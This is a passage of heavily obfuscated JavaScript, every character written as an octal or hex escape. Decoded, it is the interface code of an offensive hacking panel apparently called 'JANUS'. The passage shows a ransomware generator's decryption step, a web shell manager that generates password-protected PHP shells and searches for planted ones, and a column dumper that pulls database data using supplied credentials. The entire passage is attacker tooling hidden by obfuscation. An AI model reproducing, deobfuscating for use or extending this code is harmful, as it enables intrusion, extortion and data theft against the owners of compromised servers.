61\164\165\163\40\x3d\75\75\40\47\163\x75\x63\x63\145\x73\163\47\51\40\x7b\xa\11\11\x9\11\x69\x66\x20\50\162\145\163\165\x6c\x74\x73\105\154\51\40\173\12\x9\11\x9\11\x9\x72\145\163\165\x6c\164\163\x45\154\56\151\156\x6e\x65\x72\110\124\115\x4c\40\x3d\40\x60\x3c\144\x69\166\x20\x73\164\171\x6c\145\x3d\x22\160\x61\x64\x64\151\156\x67\x3a\61\x35\160\x78\x3b\40\x62\x61\x63\x6b\147\162\157\x75\156\144\x3a\x76\x61\x72\x28\x2d\x2d\x62\x67\x2d\x6c\x69\x67\150\164\51\x3b\x20\x62\x6f\x72\144\145\x72\55\162\x61\x64\x69\x75\163\x3a\x36\x70\170\73\42\x3e\xa\x9\x9\11\x9\x9\x9\74\x68\x34\40\x73\164\171\154\x65\75\x22\x6d\141\x72\x67\x69\156\x2d\x74\x6f\x70\x3a\60\73\x20\x63\157\154\x6f\162\x3a\166\x61\x72\50\55\x2d\x61\143\x63\x65\156\164\x2d\147\x72\145\x65\x6e\x29\73\42\76\xe2\x9c\x85\40\104\145\x63\162\171\x70\164\151\x6f\x6e\x20\x43\x6f\x6d\x70\154\x65\x74\145\74\57\150\x34\76\xa\x9\11\11\x9\x9\x9\x3c\160\76\74\163\164\162\x6f\x6e\x67\76\117\162\151\147\x69\x6e\141\154\40\x66\151\x6c\145\40\162\x65\x73\x74\x6f\x72\145\144\x3a\74\x2f\163\x74\x72\x6f\x6e\147\76\40\x24\x7b\x72\x65\163\x2e\x6f\x72\x69\x67\151\x6e\141\x6c\137\146\x69\x6c\145\x7d\x3c\57\160\x3e\12\x9\x9\x9\11\x9\x3c\x2f\x64\151\x76\x3e\140\73\xa\x9\11\11\11\x7d\12\x9\x9\11\11\164\150\151\163\x2e\141\144\x64\116\157\x74\x69\146\x69\x63\x61\x74\x69\x6f\156\x28\x27\122\x61\156\x73\157\x6d\x77\x61\x72\145\x20\x47\x65\156\145\x72\x61\x74\157\x72\47\x2c\x20\47\x46\x69\x6c\145\40\x64\145\143\162\x79\160\164\x65\144\40\163\x75\x63\143\145\163\163\146\165\154\154\x79\47\x2c\40\x27\x73\x75\143\x63\x65\163\x73\x27\51\73\xa\x9\11\11\175\x20\145\154\163\145\40\173\xa\x9\x9\11\11\151\146\x20\x28\162\145\163\165\x6c\164\163\105\x6c\x29\x20\173\12\11\11\11\x9\x9\x72\x65\163\165\154\164\x73\x45\154\56\151\156\x6e\x65\x72\110\124\x4d\114\x20\x3d\x20\x60\x3c\x70\40\163\x74\x79\154\145\x3d\x22\143\x6f\154\157\162\x3a\166\141\x72\50\55\55\141\143\143\x65\x6e\x74\55\162\145\144\51\x3b\42\x3e\x24\173\x72\145\163\77\x2e\155\145\163\163\x61\147\x65\40\x7c\x7c\40\x27\x44\145\143\x72\x79\160\164\x69\157\156\x20\146\x61\151\x6c\145\x64\x2e\47\175\74\x2f\x70\76\140\73\12\x9\x9\x9\x9\x7d\12\x9\x9\11\11\164\150\x69\x73\x2e\x74\x6f\x61\x73\164\50\162\x65\x73\x3f\56\155\145\x73\163\141\147\x65\x20\174\174\40\x27\x44\x65\143\162\171\160\164\x69\157\156\x20\x66\141\x69\x6c\145\x64\56\47\54\x20\x27\x65\162\x72\157\162\x27\51\x3b\xa\11\11\11\x7d\12\x9\x9\x7d\54\xa\11\11\xa\x9\x9\x2f\57\40\127\145\142\40\x53\150\x65\x6c\154\x20\115\x61\x6e\x61\147\145\x72\xa\x9\x9\x61\163\x79\156\143\x20\147\x65\156\145\x72\x61\164\x65\127\x65\142\x53\150\x65\x6c\x6c\50\51\x20\x7b\xa\x9\x9\11\143\157\156\163\164\x20\160\141\x73\163\x77\157\x72\144\x20\75\x20\x64\x6f\x63\x75\x6d\145\156\x74\56\147\145\x74\105\x6c\145\155\x65\x6e\164\102\171\x49\x64\x28\x27\163\150\145\154\154\x2d\160\x61\x73\x73\x77\x6f\x72\144\x27\x29\77\56\166\x61\x6c\165\145\40\174\x7c\40\x27\x6a\141\x6e\165\x73\x27\x3b\xa\11\x9\11\xa\x9\11\x9\x63\x6f\x6e\x73\x74\40\x72\x65\163\x20\x3d\40\141\167\x61\x69\164\x20\x74\x68\x69\x73\56\x61\160\151\x28\x27\147\145\x6e\145\162\141\x74\145\137\x77\x65\142\x73\150\x65\154\154\x27\x2c\40\x7b\12\x9\11\x9\11\x74\x79\x70\145\x3a\40\x27\160\x68\x70\x27\x2c\12\x9\11\x9\11\160\x61\163\163\167\157\x72\144\72\40\x70\x61\163\x73\167\x6f\162\x64\xa\11\x9\x9\x7d\x29\73\12\x9\11\x9\xa\11\11\x9\151\146\x20\50\x72\x65\163\x20\x26\x26\40\162\x65\x73\x2e\x73\x74\x61\x74\165\x73\40\75\x3d\75\x20\47\163\x75\143\x63\145\163\163\47\51\x20\173\xa\11\x9\11\x9\143\x6f\x6e\x73\x74\x20\x63\157\x64\x65\x45\x6c\x20\x3d\x20\144\x6f\143\x75\x6d\145\156\x74\56\x67\x65\164\x45\154\145\x6d\145\156\164\x42\171\x49\x64\50\x27\147\145\x6e\145\x72\141\164\x65\144\x2d\x73\150\x65\x6c\x6c\55\x63\x6f\144\145\47\x29\x3b\xa\x9\11\11\x9\x69\x66\40\50\143\157\144\x65\x45\x6c\51\40\173\12\11\11\11\11\11\x63\x6f\144\145\105\x6c\56\x76\x61\154\165\145\40\75\40\162\x65\163\56\x73\x68\x65\x6c\x6c\x5f\x63\157\144\145\73\12\x9\x9\11\11\x9\x74\x68\151\163\56\164\x6f\x61\x73\x74\50\x27\x4c\x69\147\x68\x74\x77\145\151\x67\150\x74\40\x73\x68\x65\x6c\154\40\147\x65\156\145\162\141\164\145\144\40\163\x75\143\x63\145\x73\163\146\165\x6c\x6c\171\x21\x27\54\40\x27\163\x75\x63\x63\x65\163\x73\x27\x29\x3b\12\11\x9\x9\x9\11\x74\150\x69\163\56\141\x64\144\x4e\x6f\164\x69\146\x69\143\141\164\151\x6f\x6e\50\x27\x57\x65\x62\40\123\150\145\x6c\154\40\x4d\141\156\141\x67\145\162\47\x2c\x20\x60\x47\x65\x6e\x65\x72\x61\x74\145\x64\x20\163\x68\x65\154\x6c\x20\x77\x69\x74\150\x20\x69\x64\145\x6e\164\x69\146\x69\145\x72\x3a\x20\44\x7b\162\145\163\x2e\x69\144\145\156\x74\x69\x66\x69\x65\162\x3f\56\x73\x75\142\163\x74\162\x69\156\x67\50\60\x2c\x20\63\60\51\175\x2e\56\56\x60\54\x20\x27\163\165\x63\x63\x65\x73\x73\47\51\x3b\12\x9\x9\11\11\x7d\12\11\x9\x9\175\40\x65\x6c\x73\x65\x20\173\xa\11\11\x9\x9\164\x68\x69\x73\x2e\164\157\x61\x73\x74\50\x27\106\141\x69\154\x65\144\x20\164\157\x20\x67\145\156\x65\x72\141\x74\145\x20\x73\150\x65\154\154\x2e\x27\x2c\x20\47\145\162\162\157\x72\x27\x29\x3b\12\x9\11\x9\175\12\11\x9\x7d\x2c\xa\x9\x9\12\11\x9\143\157\160\171\123\x68\x65\154\x6c\x43\x6f\x64\x65\x28\51\40\x7b\12\x9\x9\11\x63\x6f\x6e\x73\164\x20\x63\x6f\x64\145\105\x6c\40\75\40\144\157\x63\x75\155\145\x6e\x74\56\x67\145\164\105\x6c\x65\x6d\x65\x6e\164\102\171\111\144\x28\x27\147\145\x6e\145\162\141\164\x65\144\x2d\163\x68\x65\154\154\55\x63\x6f\144\x65\47\51\x3b\xa\x9\x9\11\x69\146\x20\x28\x63\x6f\x64\145\x45\x6c\40\46\46\x20\x63\x6f\144\145\105\154\x2e\x76\141\154\165\x65\x29\40\173\12\11\11\11\11\x63\x6f\144\x65\105\154\56\163\x65\x6c\145\x63\164\50\51\x3b\12\x9\x9\11\11\x64\157\143\165\155\x65\156\x74\56\x65\170\x65\143\103\x6f\155\x6d\141\x6e\144\50\47\143\157\x70\171\x27\51\73\12\x9\11\11\11\164\x68\x69\163\56\x74\x6f\x61\x73\164\x28\47\x53\x68\x65\x6c\154\x20\x63\157\x64\145\40\x63\157\160\x69\145\144\40\164\157\40\143\x6c\x69\160\142\x6f\141\162\144\41\x27\x2c\40\47\163\x75\143\x63\145\x73\163\47\51\x3b\xa\x9\11\x9\175\40\x65\x6c\x73\145\40\x7b\12\11\x9\11\x9\x74\x68\x69\x73\56\x74\157\141\x73\164\x28\47\x4e\157\x20\163\150\x65\x6c\x6c\x20\143\x6f\x64\x65\40\164\x6f\40\x63\x6f\x70\x79\x2e\40\x47\x65\156\x65\162\141\164\x65\40\x61\x20\163\x68\x65\x6c\154\40\x66\x69\x72\163\164\x2e\x27\x2c\40\47\x65\x72\x72\x6f\162\x27\x29\73\12\11\x9\11\175\12\x9\x9\x7d\54\xa\11\x9\12\x9\x9\x61\163\171\x6e\143\x20\146\x69\x6e\x64\127\145\142\123\150\x65\154\154\163\50\x29\x20\173\12\x9\x9\11\143\x6f\156\x73\x74\x20\x73\x65\x61\x72\x63\150\x50\x61\164\x68\x20\75\x20\144\157\143\165\155\x65\x6e\x74\x2e\x67\x65\164\x45\x6c\145\x6d\145\x6e\x74\102\x79\111\144\x28\x27\146\151\156\x64\55\163\x68\145\154\154\163\55\x70\141\x74\x68\47\x29\77\x2e\166\141\x6c\165\x65\x20\174\x7c\40\164\150\151\x73\56\143\x77\144\x3b\12\x9\11\x9\12\11\x9\11\x69\146\x20\x28\x21\163\145\x61\x72\143\x68\x50\141\x74\150\x29\40\173\12\11\x9\11\11\162\145\164\165\162\x6e\x20\164\150\151\x73\x2e\x74\x6f\x61\x73\164\50\47\123\145\x61\x72\143\x68\x20\160\141\164\x68\40\x69\163\x20\x72\x65\161\x75\151\162\145\x64\56\x27\x2c\40\47\145\x72\x72\157\x72\x27\51\x3b\xa\x9\11\11\x7d\12\x9\11\x9\12\x9\x9\x9\143\x6f\x6e\x73\x74\40\x72\x65\x73\x75\154\x74\163\x45\154\40\75\x20\144\x6f\143\165\155\x65\x6e\x74\56\147\x65\164\105\x6c\x65\155\x65\x6e\164\x42\x79\111\144\x28\47\x66\x69\x6e\144\x2d\x73\150\145\x6c\154\163\55\x72\x65\163\165\154\164\x73\47\51\x3b\12\11\11\11\x69\x66\40\50\162\145\163\165\x6c\x74\x73\105\154\51\40\162\145\x73\x75\x6c\164\163\105\x6c\x2e\151\x6e\156\x65\162\x48\x54\115\114\x20\75\40\47\x3c\x70\x20\163\x74\171\x6c\145\x3d\x22\x63\x6f\154\157\162\72\166\x61\x72\50\x2d\x2d\x61\143\x63\x65\156\164\55\147\x6f\x6c\144\51\x3b\x22\76\x53\x65\x61\x72\143\150\151\156\147\40\146\x6f\162\40\x73\x68\145\154\154\163\56\56\x2e\x3c\57\160\x3e\47\x3b\xa\11\11\x9\12\11\11\11\x63\157\x6e\x73\x74\40\x72\x65\163\40\x3d\x20\x61\167\141\151\164\x20\x74\x68\x69\x73\x2e\141\160\151\50\x27\154\151\163\164\137\167\x65\142\163\x68\145\x6c\x6c\163\x27\54\x20\x7b\xa\11\11\11\x9\x73\145\x61\162\x63\150\x5f\x70\141\x74\150\72\x20\x73\x65\x61\x72\x63\x68\x50\x61\x74\150\12\11\11\x9\175\51\73\xa\11\x9\x9\xa\11\11\x9\x69\x66\40\50\x72\x65\163\x20\x26\x26\40\x72\x65\163\56\163\164\141\x74\x75\x73\x20\75\x3d\x3d\x20\47\163\x75\143\143\145\163\x73\47\x29\40\173\12\11\11\x9\11\143\157\x6e\x73\x74\x20\163\150\x65\154\x6c\163\40\x3d\40\162\145\163\56\163\150\145\x6c\154\x73\x20\174\x7c\x20\x5b\135\73\xa\x9\x9\x9\x9\151\x66\x20\x28\x72\x65\x73\x75\154\x74\x73\x45\154\51\x20\173\12\11\11\11\x9\x9\151\146\40\50\163\x68\x65\x6c\154\163\x2e\x6c\145\x6e\147\164\150\x20\x3d\75\75\40\60\51\40\x7b\xa\11\x9\x9\x9\x9\11\162\x65\163\165\154\164\163\x45\154\56\x69\x6e\156\145\162\x48\124\115\114\40\75\40\47\x3c\160\x20\x73\164\x79\x6c\145\x3d\x22\143\x6f\x6c\x6f\162\x3a\166\x61\162\50\55\x2d\x74\145\170\164\55\x6d\x65\x64\51\x3b\x20\164\145\x78\164\x2d\141\x6c\x69\x67\156\72\x63\x65\156\x74\145\x72\x3b\x22\x3e\116\157\40\x73\150\x65\154\154\x73\40\146\x6f\165\156\x64\56\74\x2f\160\76\47\x3b\12\x9\11\x9\x9\x9\x7d\x20\145\154\x73\145\40\x7b\xa\11\11\x9\11\x9\x9\x6c\x65\164\x20\x68\164\x6d\x6c\40\75\40\x60\x3c\144\151\x76\x20\163\x74\171\x6c\145\x3d\x22\160\x61\x64\144\x69\156\147\x3a\x31\x30\x70\x78\x3b\40\142\141\x63\x6b\x67\x72\157\165\156\x64\72\x76\141\162\x28\x2d\55\x62\x67\x2d\154\x69\147\150\164\x29\73\x20\x62\157\x72\x64\145\x72\x2d\162\141\144\x69\x75\163\72\66\x70\170\73\40\155\141\162\x67\151\x6e\55\142\x6f\x74\x74\157\155\72\61\162\145\x6d\x3b\x22\x3e\12\x9\11\11\x9\x9\x9\11\x3c\x73\164\162\157\156\x67\76\106\x6f\165\156\x64\x20\44\x7b\x73\x68\145\154\154\163\x2e\154\145\156\147\x74\x68\175\40\163\x68\145\154\154\x28\x73\x29\40\167\151\x74\150\40\x4a\x41\x4e\125\x53\40\x69\144\145\156\164\151\x66\151\145\x72\72\74\57\x73\164\x72\x6f\156\x67\76\xa\11\x9\x9\11\x9\x9\x3c\57\x64\x69\166\76\12\x9\11\x9\x9\x9\x9\x3c\144\151\x76\x20\x73\164\171\154\x65\x3d\42\x6f\166\145\162\x66\x6c\157\x77\x2d\x78\72\x61\x75\x74\157\73\x22\76\xa\11\11\x9\11\x9\11\11\x3c\164\x61\142\154\x65\x20\x63\x6c\141\163\x73\x3d\x22\x72\x65\x73\x75\x6c\164\x73\55\x74\141\x62\154\145\x22\76\xa\11\11\11\x9\x9\x9\x9\x9\74\x74\x68\145\x61\144\x3e\xa\x9\11\11\11\x9\x9\x9\11\11\x3c\x74\x72\x3e\12\x9\11\x9\x9\11\x9\x9\11\x9\11\74\164\150\76\120\141\x74\x68\74\x2f\x74\150\76\xa\x9\x9\11\11\x9\x9\11\11\11\x9\x3c\x74\150\x3e\116\141\155\x65\74\57\164\x68\x3e\12\11\11\11\x9\11\x9\11\11\x9\11\74\164\x68\76\111\x64\x65\x6e\x74\x69\146\x69\145\162\74\x2f\164\x68\76\12\x9\x9\x9\11\11\11\x9\x9\x9\x9\x3c\164\x68\76\x53\x69\172\145\x3c\x2f\x74\150\x3e\12\11\11\11\x9\x9\11\x9\11\11\11\x3c\x74\x68\x3e\115\157\144\x69\146\x69\x65\x64\74\57\164\150\76\xa\x9\11\11\x9\11\11\x9\x9\11\11\74\x74\150\76\120\x65\162\x6d\151\163\163\x69\157\x6e\163\74\x2f\x74\x68\x3e\xa\x9\x9\11\x9\11\x9\11\11\11\74\x2f\164\x72\76\12\x9\x9\11\11\11\11\x9\x9\x3c\x2f\164\x68\x65\141\144\76\xa\11\11\11\x9\11\11\11\11\74\x74\142\157\x64\171\x3e\x60\x3b\xa\11\11\11\11\11\x9\xa\x9\11\x9\x9\x9\11\163\x68\145\x6c\154\x73\x2e\146\157\x72\105\x61\143\150\x28\163\150\x65\154\154\x20\x3d\x3e\40\173\xa\11\11\11\11\x9\11\11\x68\164\x6d\154\x20\53\x3d\40\140\74\x74\162\76\xa\x9\11\x9\11\11\11\11\x9\74\x74\x64\x20\x73\x74\171\x6c\145\75\42\146\x6f\156\164\55\146\x61\x6d\x69\154\171\x3a\155\157\x6e\x6f\163\x70\x61\143\x65\x3b\x20\x66\157\x6e\164\55\163\x69\172\x65\x3a\60\56\x39\x72\145\x6d\73\x22\76\44\173\164\x68\x69\x73\x2e\x65\163\x63\x61\160\x65\110\164\x6d\x6c\x28\163\x68\x65\154\x6c\x2e\x70\x61\x74\150\x29\x7d\x3c\x2f\164\x64\76\xa\11\x9\11\11\11\x9\x9\11\x3c\x74\x64\76\74\163\x74\162\x6f\156\147\76\x24\x7b\x74\150\151\x73\56\x65\x73\143\x61\160\x65\x48\x74\155\x6c\x28\x73\x68\145\x6c\x6c\x2e\x6e\x61\x6d\145\51\x7d\74\x2f\x73\x74\162\x6f\156\x67\x3e\74\57\x74\x64\76\xa\x9\x9\11\x9\x9\x9\11\x9\74\x74\x64\40\x73\x74\x79\154\x65\x3d\42\x66\157\156\164\x2d\146\141\x6d\x69\x6c\171\x3a\155\x6f\156\x6f\163\160\141\143\x65\x3b\40\x66\157\x6e\x74\55\163\151\x7a\145\72\60\56\x38\x35\x72\145\x6d\x3b\40\143\157\154\x6f\162\x3a\166\x61\x72\x28\x2d\55\141\143\x63\x65\156\164\x2d\147\x6f\x6c\x64\51\x3b\x22\x3e\44\x7b\x74\150\x69\x73\x2e\x65\163\143\x61\x70\145\x48\164\x6d\x6c\50\163\150\x65\x6c\154\56\x69\144\145\x6e\164\x69\x66\x69\145\x72\x20\174\x7c\x20\47\x4e\57\101\x27\51\x7d\x3c\57\164\x64\x3e\12\x9\x9\x9\x9\11\11\11\x9\74\164\x64\x3e\44\x7b\x74\150\x69\163\x2e\146\x6f\x72\x6d\141\x74\102\x79\164\145\x73\x28\x73\x68\x65\x6c\154\x2e\x73\151\172\145\x29\x7d\x3c\x2f\164\144\x3e\xa\x9\x9\x9\11\x9\11\11\11\74\164\x64\x3e\x24\x7b\x73\150\x65\x6c\154\x2e\155\x6f\x64\151\x66\151\x65\144\175\x3c\57\x74\x64\x3e\12\x9\11\x9\x9\11\11\x9\x9\74\164\144\40\163\164\x79\x6c\145\75\42\146\157\156\x74\x2d\x66\141\x6d\151\154\x79\x3a\x6d\157\156\157\163\160\141\x63\145\73\x22\76\x24\173\163\x68\x65\154\154\x2e\160\145\x72\x6d\x69\x73\x73\x69\x6f\x6e\x73\x7d\x3c\x2f\x74\x64\x3e\xa\11\x9\x9\11\x9\x9\x9\x3c\57\x74\162\x3e\x60\73\xa\11\x9\x9\11\11\x9\x7d\x29\73\12\x9\11\11\x9\x9\11\12\11\11\x9\x9\x9\11\x68\x74\155\x6c\x20\53\75\x20\140\74\x2f\x74\x62\x6f\144\x79\76\74\x2f\164\141\x62\x6c\145\x3e\x3c\57\144\x69\166\x3e\140\x3b\xa\11\11\x9\x9\11\x9\162\145\163\x75\x6c\164\x73\x45\x6c\x2e\x69\156\x6e\x65\x72\x48\124\115\114\x20\75\40\x68\x74\155\x6c\x3b\12\x9\11\11\x9\x9\x7d\xa\x9\x9\x9\x9\175\12\x9\11\x9\11\x74\150\x69\x73\56\164\x6f\141\163\x74\x28\x60\106\x6f\x75\x6e\144\40\x24\x7b\x73\x68\x65\154\154\163\x2e\x6c\145\156\x67\164\x68\x7d\40\x73\150\x65\154\154\50\163\x29\140\x2c\x20\163\150\x65\x6c\x6c\x73\56\154\x65\156\147\x74\x68\x20\x3e\40\x30\40\77\40\x27\163\x75\143\143\145\163\163\47\40\x3a\x20\x27\x69\x6e\146\x6f\x27\51\x3b\12\11\x9\11\11\x74\150\x69\163\x2e\141\144\x64\116\x6f\x74\x69\x66\151\x63\x61\164\151\157\x6e\x28\47\127\x65\x62\x20\x53\x68\x65\x6c\x6c\40\x4d\x61\156\x61\147\x65\162\x27\54\x20\140\x46\157\x75\x6e\144\40\x24\x7b\x73\x68\x65\154\154\163\x2e\154\x65\x6e\x67\x74\x68\175\x20\163\150\x65\x6c\154\50\163\51\140\x2c\40\x73\150\x65\x6c\x6c\163\x2e\x6c\145\156\x67\164\150\40\76\x20\60\x20\77\40\x27\163\x75\x63\x63\x65\x73\x73\47\40\x3a\x20\47\x69\156\x66\157\x27\x29\73\12\11\x9\x9\175\40\x65\154\163\x65\x20\173\12\11\11\11\11\151\146\40\50\162\x65\x73\165\154\164\163\x45\154\51\x20\x7b\xa\x9\11\x9\x9\11\x72\145\x73\x75\x6c\164\x73\105\x6c\56\x69\x6e\x6e\x65\162\x48\x54\x4d\x4c\x20\75\40\140\x3c\160\40\x73\x74\171\154\145\x3d\42\143\x6f\154\x6f\162\72\166\x61\162\x28\55\55\141\143\143\x65\156\x74\x2d\x72\x65\144\51\73\x22\x3e\xe2\235\x8c\x20\x24\x7b\x72\x65\x73\x3f\56\x6d\x65\x73\x73\141\x67\145\x20\x7c\174\x20\47\x53\x65\141\162\x63\x68\x20\x66\x61\x69\x6c\145\144\x2e\47\x7d\x3c\x2f\x70\76\140\x3b\12\x9\11\11\11\175\12\x9\x9\11\x9\164\150\151\x73\x2e\164\x6f\x61\x73\x74\x28\162\x65\163\77\56\x6d\x65\x73\163\141\147\145\x20\x7c\x7c\40\x27\123\145\141\162\143\x68\40\x66\141\151\154\x65\x64\56\47\x2c\x20\47\145\162\x72\x6f\162\47\x29\x3b\xa\x9\11\11\175\xa\11\11\175\x2c\xa\11\x9\12\11\11\x65\163\x63\x61\160\145\110\164\155\154\x28\x74\145\x78\164\x29\x20\x7b\xa\11\11\11\x63\x6f\x6e\163\164\40\144\151\x76\x20\75\x20\144\157\x63\165\155\145\x6e\164\x2e\143\162\145\x61\164\x65\x45\x6c\145\155\x65\x6e\x74\x28\x27\144\x69\166\x27\x29\73\12\x9\x9\11\144\151\x76\56\164\x65\170\164\x43\157\x6e\164\x65\156\164\40\75\40\164\145\x78\164\x3b\xa\x9\11\x9\x72\x65\164\x75\162\x6e\40\144\x69\x76\x2e\x69\156\x6e\145\x72\x48\x54\x4d\x4c\73\12\x9\x9\175\54\12\11\11\xa\x9\11\146\x6f\x72\x6d\141\164\102\x79\164\145\x73\x28\142\171\164\x65\163\51\x20\173\12\11\11\x9\151\146\40\x28\x62\171\164\145\x73\40\x3d\75\75\40\x30\x29\40\162\145\164\165\x72\156\40\47\60\40\x42\47\x3b\xa\11\x9\x9\x63\x6f\156\163\164\40\x6b\x20\x3d\40\61\60\x32\x34\x3b\xa\11\11\x9\x63\x6f\156\x73\x74\40\x73\151\x7a\145\163\x20\x3d\x20\133\47\102\47\54\40\x27\x4b\x42\x27\54\x20\47\x4d\102\47\54\x20\x27\x47\102\x27\x5d\73\xa\11\x9\x9\x63\x6f\x6e\163\x74\x20\151\x20\75\40\115\141\x74\150\56\146\x6c\157\157\162\x28\115\141\164\x68\x2e\x6c\157\x67\x28\142\171\164\145\x73\51\x20\57\x20\115\141\x74\x68\x2e\154\x6f\x67\50\153\x29\x29\73\xa\11\x9\11\x72\145\164\165\162\x6e\40\x4d\141\x74\150\x2e\x72\157\x75\156\144\x28\x62\x79\x74\x65\163\x20\x2f\40\x4d\x61\164\150\x2e\x70\157\167\50\x6b\x2c\40\151\x29\x20\52\x20\61\60\60\x29\x20\57\x20\61\60\x30\x20\x2b\40\47\x20\x27\40\53\x20\x73\151\x7a\145\163\x5b\151\135\73\xa\x9\x9\x7d\x2c\12\11\11\xa\11\x9\57\x2f\40\103\157\154\x75\x6d\x6e\x20\104\x75\x6d\160\145\162\12\11\x9\x61\x73\x79\156\143\x20\x63\x6f\x6c\x75\x6d\156\104\165\x6d\x70\145\x72\50\x29\40\x7b\12\x9\x9\11\x63\x6f\156\x73\x74\x20\x68\157\163\164\x20\x3d\x20\x64\x6f\143\x75\155\145\156\x74\x2e\x67\x65\164\x45\x6c\145\x6d\145\156\164\102\x79\111\144\x28\x27\143\157\x6c\55\x64\165\x6d\x70\55\x68\x6f\x73\164\x27\x29\x3f\56\x76\x61\154\x75\145\73\12\x9\11\x9\x63\x6f\156\163\164\40\165\163\x65\x72\40\75\x20\x64\157\x63\x75\x6d\145\x6e\164\x2e\x67\x65\164\x45\x6c\x65\x6d\x65\x6e\x74\x42\171\111\x64\50\47\143\157\154\55\144\x75\x6d\x70\55\x75\163\x65\162\47\x29\x3f\x2e\166\141\154\165\145\73\12\11\x9\11\143\157\x6e\163\164\40\x70\x61\163\163\x20\x3d\40\x64\x6f\143\x75\x6d\x65\x6e\x74\x2e\147\145\x74\x45\x6c\x65\x6d\145\x6e\164\102\171\x49\144\50\x27\143\157\x6c\x2d\x64\x75\x6d\x70\55\x70\141\163\x73\47\x29\x3f\56\x76\x61\x6c\x75\145\x3b\xa\x9\x9\11\x63\157\x6e\x73\164\40\x64\x61\x74\x61\142\x61\163\x65\x20\75\x20\144\157\x63\x75\x6d\x65\156\x74\56\x67\145\164\105\154\145\x6d\145\x6e\x74\x42\171\x49\144\x28\x27\x63\157\154\55\144\x75\155\x70\x2d\144\142\x27\x29\77\56\166\141\154\165\x65\73\12\11\11\11\143\157\156\x73\x74\40\164\141\x62\x6c\145\40\x3d\40\144\x6f\143\165\155\145\156\x74\x2e\147\x65\x74\105\154\x65\155\145\x6e\164\x42\x79\111\x64\x28\x27\x63\157\154\x2d\144\165\155\160\x2d\164\x61\142\x6c\145\47\x29\77\56\x76\x61\x6c\x75\x65\73\12\x9\x9\x9\143\157\156\x73\x74\40\x63\x6f\154\x75\155\156\40\75\40\144\157\143\x75\155\x65\x6e\x74\56\x67\x65\x74\x45\154\145\x6d\145\x6e\164\x42\x79\x49\144\50\x27\143\x6f\x6c\55\144\165\x6d\160\55\143\157\154\x75\x6d\x6e\47\x29\77\56\166\141\154\x75\x65\x3b\12\11\x9\11\xa\x9\x9\x9\x69\146\40\50\41\150\x6f\x73\164\x20\x7c\x7c\x20\x21\x75\x73\x65\162\x20\174\174\40\x21\144\x61\x74\141\x62\x61\x73\x65\x20\x7c\x7c\40\x21\x74\141\x62\x6c\x65\40\x7c\x7c\x20\x21\143\157\154\165\155\x6e\51\x20\x7b\12\11\11\x9\x9\162\145\x74\165\x72\156\40\x74\x68\151\163\56\164\157\141\x73\164\50\x27\x41\x6c\154\40\x66\151\x65\x6c\x64\x73\x20\x61\162\x65\x20\162\145\x71\x75\151\162\145\144\x2e\47\54\40\x27\145\162\x72\x6f\162\47\51\x3b\xa\x9\11\11\x7d\12\11\11\x9\xa\x9\11\11\x63\x6f\x6e\x73\x74\x20\x72\145\x73\x75\154\x74\163\x45\154\x20\x3d\x20\x64\x6f\143\x75\155\x65\156\164\56\147\x65\x74\105\154\145\155\145\x6e\164\x42\x79\x49\144\50\47\143\x6f\154\55\144\165\155\x70\55\162\x65\163\165\x6c\164\163\x27\51\73\12\11\11\x9\151\x66\40\x28\162\145\163\165\x6c\x74\x73\x45\x6c\51\x20\x72\x65\x73\x75\154\x74\163\x45\154\x2e\x69\156\156\x65\x72\110\x54\x4d\x4c\40\75\x20\47\74\x70\x20\163\164\171\x6c\x65\x3d\42\143\x6f\154\x6f\162\72\x76\x61\x72\50\x2d\x2d\x61\x63\x63\145\x6e\164\55\147\x6f\154\x64\x29\x3b\42\76\x44\x75\155\160\151\x6e\x67\40\x63\157\154\x75\155\156\x2e\56\x2e\74\57\160\76\47\x3b\xa\11\11\x9\xa\11\x9\x9\x63\x6f\x6e\x73\x74\x20\x72\x65\163\40\x3d\40\x61\167\x61\x69\164\40\x74\x68\151\163\56\x61\x70\151\x28\47\x63\x6f\154\165\x6d\x6e\x5f\144\165\x6d\160\x65\x72\47\54\x20\x7b\x20\x68\x6f\x73\164\54\40\x75\163\145\x72\x2c\x20\160\141\x73\x73\54\x20\x64\141\x74\x61\x62\141\163\145\x2c\40\x74\141\142\154\145\54\40\143\157\x6c\165\x6d\156\x20\x7d\x29\x3b\12\11\11\x9\xa\x9\x9\x9\x69\146\x20\50\162\x65\163\40\46\46\x20\x72\145\x73\56\x73\164\x61\x74\165\x73\40\x3d\75\75\40\x27\x73\x75\x63\143\145\x73\x73\x27\x29\x20\173\12\11\x9\11\x9\143\x6f\156\163\164\x20\144\141\164\141\x20\x3d\x20\x72\x65\x73\56\144\x61\x74\x61\x20\174\x7c\x20\x5b\x5d\x3b\xa\x9\x9\x9\x9\151\x66\40\50\162\x65\163\165\154\164\163\x45\154\x29\40\x7b\xa\11\11\x9\x9\11\154\145\x74\x20\x68\164\155\x6c\40\x3d\40\x60\x3c\144\x69\166\40\x73\x74\x79\154\145\75\x22\x70\141\x64\144\151\156\x67\72\61\x30\x70\x78\x3b\x20\x62\141\x63\x6b\x67\162\157\165\x6e\x64\x3a\x76\x61\162\50\x2d\x2d\142\147\55\x6c\x69\147\x68\164\51\x3b\x20\142\157\x72\144\145\162\55\x72\x61\144\x69\x75\163\x3a\x36\x70\170\x3b\40\155\141\x72\147\x69\x6e\x2d\x62\x6f\164\164\157\x6d\x3a\x31\x72\x65\155\x3b\x22\76\12\11\x9\11\11\11\11\x3c\x73\x74\162\x6f\x6e\147\x3e\106\157\165\x6e\144\x20\44\173\144\141\164\x61\x2e\x6c\x65\156\147\x74\x68\x7d\40\162\157\167\x28\163\51\x3a\x3c\x2f\x73\164\162\157\156\147\76\xa\11\11\11\11\11\74\57\x64\x69\x76\x3e\xa\11\11\x9\x9\11\x3c\160\162\x65\x20\x63\x6c\x61\163\163\x3d\x22\x6f\165\x74\160\165\x74\55\x62\157\x78\x22\40\x73\x74\171\154\x65\75\x22\x6d\x61\x78\55\x68\x65\151\x67\150\164\x3a\64\60\60\160\x78\x3b\40\x6f\166\x65\x72\146\154\157\x77\x2d\x79\72\x61\x75\164\157\73\x22\x3e\44\x7b\164\150\x69\163\x2e\145\163\143\x61\x70\145\110\164\155\154\x28\x64\x61\164\x61\x2e\x6a\x6f\151\x6e\50\x27\134\156\47\51\51\x7d\x3c\57\160\x72\145\x3e\x60\73\12\11\11\x9\x9\11\x72\x65\x73\x75\x6c\164\163\x45\154\x2e\151\156\156\145\x72\x48\x54\x4d\114\x20\x3d\x20\x68\x74\155\x6c\73\12\x9\11\11\11\x7d\xa\x9\x9\x9\x9\164\150\x69\163\56\x74\157\141\163\x74\x28\x60\x44\x75\x6d\16